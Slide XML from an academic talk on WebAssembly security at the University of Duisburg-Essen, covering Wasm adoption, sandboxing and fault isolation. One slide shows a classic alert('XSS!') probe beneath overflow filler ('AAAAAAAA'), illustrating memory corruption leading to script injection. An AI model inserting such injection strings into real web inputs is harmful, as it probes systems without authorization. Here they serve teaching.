                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C088452-9189-E5BB-B7DA-0183E9B7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24" y="5149246"/>
            <a:ext cx="700339" cy="7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5C04582-F759-9011-2524-8CD267E034A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1482082" y="5048414"/>
            <a:ext cx="1430705" cy="1170360"/>
            <a:chOff x="1487182" y="5038814"/>
            <a:chExt cx="1430705" cy="1170360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{606B3BF9-0030-85DF-662C-19723D48FCB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1487182" y="5038814"/>
              <a:ext cx="1430705" cy="1168411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 err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg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image</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE"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pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Grafik 7" descr="Ein Bild, das Säugetier, Katze, Kleine bis mittelgroße Katzen, Pelz enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C54D72-098A-86CB-1355-2DB005536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931279" y="5543874"/>
              <a:ext cx="532635" cy="665300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6EDA09-6E81-B70C-A2FB-4EF5F6D18EEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1486055" y="4503754"/>
            <a:ext cx="712020" cy="54371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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E29AE4C6-ACC2-216C-844C-1B234DF7BC59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067573" y="3305980"/>
            <a:ext cx="1939135" cy="1283912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20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20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20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  <a:endParaRPr sz="2000" dirty="0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8F052639-8E65-9C45-1526-263BACFA8425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1458600" y="2935649"/>
            <a:ext cx="1477667" cy="3272495"/>
            <a:chOff x="903288" y="2962050"/>
            <a:chExt cx="1477667" cy="3272495"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{994CCF4D-598A-D93C-F719-25B97E4D643C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="903288" y="3952468"/>
              <a:ext cx="1477667" cy="2282077"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx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400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C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AAAAAAAA</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C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AAAAAAAA</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C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AAAAAAAA</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C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AAAAAAAA</a:t>
              </a:r>
              <a:endParaRPr sz="1400" dirty="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83" name="Google Shape;550;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486C85F3-6AF1-2F81-EF13-B1D037C64E24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="903288" y="2962050"/>
              <a:ext cx="1477667" cy="99557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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>alert(„XSS!“)</a:t>
              </a:r>
              <a:endParaRPr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7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1211 -0.247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60547 0.0518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25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60351 0.1921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69" y="960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43698 0.12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601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40222 0.1168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0.43555 -0.2240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8" grpId="0" animBg="1"/>
      <p:bldP spid="65" grpId="0" animBg="1"/>
      <p:bldP spid="65" grpId="1" animBg="1"/>
      <p:bldP spid="66" grpId="0" animBg="1"/>
      <p:bldP spid="66" grpId="1" animBg="1"/>
      <p:bldP spid="76" grpId="0" animBg="1"/>
      <p:bldP spid="76" grpId="1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23DA1C-0758-646E-6F59-722B37C2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E15D3-2628-F25B-E77F-89E70CBE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40984E-FD76-867B-10BB-6C84BD3B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26</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE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Folienzoom 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E0361EA-A45B-8D0D-906B-DD7381C7F4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2110769"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6096000" cy="3429000"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/slidezoom">
                <pslz:sldZm>
                  <pslz:sldZmObj sldId="594" cId="2251561524">
                    <pslz:zmPr id="{FCF0931F-0A28-4F18-B469-243BF2AAF05A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6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Folienzoom 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E0361EA-A45B-8D0D-906B-DD7381C7F4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6096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Folienzoom 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A48A31-57E1-E79F-5F89-2587E2CA31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2871572"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="0" y="3440381"/>
              <a:ext cx="6096000" cy="3429000"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/slidezoom">
                <pslz:sldZm>
                  <pslz:sldZmObj sldId="599" cId="4238667045">
                    <pslz:zmPr id="{E00E0429-0629-4AEC-9FF4-D61510C0A8F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6000" cy="34290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Folienzoom 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A48A31-57E1-E79F-5F89-2587E2CA31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3440381"/>
                <a:ext cx="6096000" cy="34290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Folienzoom 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42355703-3473-A1F2-C597-AD81AD1F3D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6376881"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="6095999" y="-5689"/>
              <a:ext cx="6095999" cy="3428999"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/slidezoom">
                <pslz:sldZm>
                  <pslz:sldZmObj sldId="606" cId="886126248">
                    <pslz:zmPr id="{497AF2E9-2244-4E22-BDB9-698386840F60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5999" cy="34289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Folienzoom 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42355703-3473-A1F2-C597-AD81AD1F3D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5999" y="-5689"/>
                <a:ext cx="6095999" cy="34289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1" name="Folienzoom 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ABAE433-899B-26E9-60E0-98578346C68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5405204"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="6095999" y="3440380"/>
              <a:ext cx="6095998" cy="3428999"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/slidezoom">
                <pslz:sldZm>
                  <pslz:sldZmObj sldId="607" cId="295714075">
                    <pslz:zmPr id="{8D5AE310-529B-40E9-A4AD-EEBC2CCFAF14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95998" cy="34289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1" name="Folienzoom 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ABAE433-899B-26E9-60E0-98578346C6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5999" y="3440380"/>
                <a:ext cx="6095998" cy="342899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9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9F32A-B013-E459-5FFF-FDD58748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5E6391B-8752-65FC-38BB-936A94790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736" y="613079"/>
            <a:ext cx="11905488" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing the Next-Generation Web</a:t>
            </a:r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908EB630-41B5-6C0C-9264-5168D8CFC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480" y="3277949"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Vulnerabilities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7B4D0D-86CD-9764-6C79-7CC548000FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4338620" y="4714848"/>
            <a:ext cx="357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Oussama Draissi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F10D15-0C06-9983-9A11-D91ACDD16D5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9187022" y="6252243"/>
            <a:ext cx="289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oussama.draissi@uni-due.de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D9F5B4-800D-9DAB-272C-5F6CE598E535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77899" y="6252243"/>
            <a:ext cx="285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University of Duisburg-Essen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384792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92AE1-F296-62AB-C343-8C88F2B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Applications using Wasm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25A27F5-1CAF-A7F3-C26D-E965B704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D5B2839-2E71-92BE-73A9-FDCF3A19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6534BF-5B47-1A68-CC70-BB6A1EA1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AFBB529-A57E-3973-E5DA-BFACFB678DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="284165" y="1149263"/>
            <a:ext cx="6548435" cy="2856699"/>
            <a:chOff x="284165" y="1149263"/>
            <a:chExt cx="6548435" cy="2856699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0849DFD-DFCF-6CDD-72DD-0B81CF07E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165" y="1165610"/>
              <a:ext cx="6548435" cy="2840352"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Grafik 9" descr="Ein Bild, das Text, Logo, Schrift, Symbol enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3722AA3E-9498-18E1-EC80-01FEA229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11721" r="10333"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="284165" y="1149263"/>
              <a:ext cx="722811" cy="927316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F21B4D0-67CB-2930-E341-66B62E214B71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6900863" y="1165610"/>
            <a:ext cx="4882086" cy="2451414"/>
            <a:chOff x="6900863" y="1165610"/>
            <a:chExt cx="4882086" cy="2451414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F5DF4D06-69A9-61A8-2798-D97940F71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0863" y="1165610"/>
              <a:ext cx="4882086" cy="2451414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Grafik 12" descr="Ein Bild, das Grafiken, Schrift, Logo, Symbol enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161B6498-B6CE-04CF-E0F4-A22AA08A2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676709" y="1176213"/>
              <a:ext cx="1106240" cy="817901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B9C6038-349B-A134-551F-20BB533B1E0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="284165" y="4250454"/>
            <a:ext cx="3311525" cy="2226073"/>
            <a:chOff x="284165" y="4250454"/>
            <a:chExt cx="3311525" cy="2226073"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2050" name="Picture 2" descr="The Photoshop web app running in a browser with an image showing an elephant on the canvas and the 'selection tools' menu item open. ">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B18CF2-3302-B7D7-47BB-C7AEBD910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65" y="4250454"/>
              <a:ext cx="3311525" cy="222607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Grafik 15" descr="Ein Bild, das Text, Schrift, Grafiken, Logo enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCFBD9C-5195-CEF9-4C11-07CDADC31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284165" y="4250454"/>
              <a:ext cx="814517" cy="814517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23B5953-574F-FABC-EF46-0DD274B7B6DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3649663" y="4250454"/>
            <a:ext cx="3182937" cy="2463746"/>
            <a:chOff x="3649663" y="4250454"/>
            <a:chExt cx="3182937" cy="24637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35300C-1E9B-AC67-FA41-498F1AFC2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49663" y="4250454"/>
              <a:ext cx="3182937" cy="2463746"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Grafik 19" descr="Ein Bild, das Grafiken, lila, Grafikdesign, Schrift enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8243B84D-1F04-E404-5827-D592349F3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4925604" y="4251198"/>
              <a:ext cx="998220" cy="665480"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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9418CA2-43F8-B286-C2CB-68A1A3D16235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6900863" y="3746109"/>
            <a:ext cx="5006971" cy="2975366"/>
            <a:chOff x="6900863" y="3746109"/>
            <a:chExt cx="5006971" cy="29753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348CF9-44F2-552A-AC41-0FDE24BD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4" t="14533" r="13697" b="13909"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6900863" y="3746109"/>
              <a:ext cx="5006971" cy="2975366"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Grafik 23" descr="Ein Bild, das Grafiken, Logo, Schrift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535EA5F8-C445-2A5A-1719-7270AB17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 l="25363" t="9958" r="26082"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10842171" y="3783290"/>
              <a:ext cx="883834" cy="9219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9FD879E6-E3BB-FD03-A824-3B913A330108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18" tooltip="https://www.pngall.com/zoom-logo-png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19" tooltip="https://creativecommons.org/licenses/by-nc/3.0/"/>
              </a:rPr>
              <a:t>CC BY-NC</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="90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84ED1740-B5EB-281A-21EA-74F71E7010E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1539059" y="2085749"/>
            <a:ext cx="9137650" cy="283092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/>
              <a:t>5% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" err="1"/>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800"/>
              <a:t> Google Chrome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" err="1"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" err="1"/>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" err="1"/>
              <a:t>instantiates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" err="1"/>
              <a:t>module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="48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69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A85C-1D61-8030-25C3-2E5C3BBCD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297B-6B5E-6EC9-4ECF-CD95092F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Security By Design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7712-E9B6-2551-C633-44EEF91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33" name="Fußzeilenplatzhalter 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CACE0C55-EAAB-E9CA-5F25-2807B195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8E04D-EADA-622D-88FF-874570B5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4</a:t>
            </a:fld>
            <a:endParaRPr lang="de-D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ECC690-4971-BD3A-DF30-F540ABFF8663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833100" y="997831"/>
            <a:ext cx="10515600" cy="725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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Many common security mechanisms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>are not needed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C3D12A68-CEFB-0A04-A60B-08D97C291037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581911" y="2143290"/>
            <a:ext cx="6068772" cy="1097400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5843733"/>
              <a:gd name="connsiteY0" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX1" fmla="*/ 182904 w 5843733"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX2" fmla="*/ 5660829 w 5843733"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX3" fmla="*/ 5843733 w 5843733"/>
              <a:gd name="connsiteY3" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX4" fmla="*/ 5843733 w 5843733"/>
              <a:gd name="connsiteY4" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX5" fmla="*/ 5660829 w 5843733"/>
              <a:gd name="connsiteY5" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX6" fmla="*/ 182904 w 5843733"/>
              <a:gd name="connsiteY6" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5843733"/>
              <a:gd name="connsiteY7" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5843733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3733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5660829" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5761844" y="0"/>
                  <a:pt x="5843733" y="81889"/>
                  <a:pt x="5843733" y="182904"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5843733" y="914496"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5843733" y="1015511"/>
                  <a:pt x="5761844" y="1097400"/>
                  <a:pt x="5660829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ADBACB"/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6" tIns="70716" rIns="70716" bIns="70716" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600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de-DE" sz="2700" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2700" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Immutability</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2700" kern="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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5C946166-C8D3-B0D8-F796-F7CC35A9A226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581911" y="3350431"/>
            <a:ext cx="6068772" cy="1097400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5843733"/>
              <a:gd name="connsiteY0" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX1" fmla="*/ 182904 w 5843733"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX2" fmla="*/ 5660829 w 5843733"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1097400"/>
              <a:gd name="connsiteX3" fmla="*/ 5843733 w 5843733"/>
              <a:gd name="connsiteY3" fmla="*/ 182904 h 1097400"/>
              <a:gd name="connsiteX4" fmla="*/ 5843733 w 5843733"/>
              <a:gd name="connsiteY4" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX5" fmla="*/ 5660829 w 5843733"/>
              <a:gd name="connsiteY5" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX6" fmla="*/ 182904 w 5843733"/>
              <a:gd name="connsiteY6" fmla="*/ 1097400 h 1097400"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 5843733"/>
              <a:gd name="connsiteY7" fmla="*/ 914496 h 1097400"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 5843733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3733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5660829" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5761844" y="0"/>
                  <a:pt x="5843733" y="81889"/>
                  <a:pt x="5843733" y="182904"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5843733" y="914496"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5843733" y="1015511"/>
                  <a:pt x="5761844" y="1097400"/>
                  <a:pt x="5660829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ADBACB"/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6" tIns="70716" rIns="70716" bIns="70716" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600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i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Software Fault Isolation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2700" i="0" kern="12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400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Wahbe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, et al., SOSP ‘93], [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Yedidia</a:t>
            </a:r>
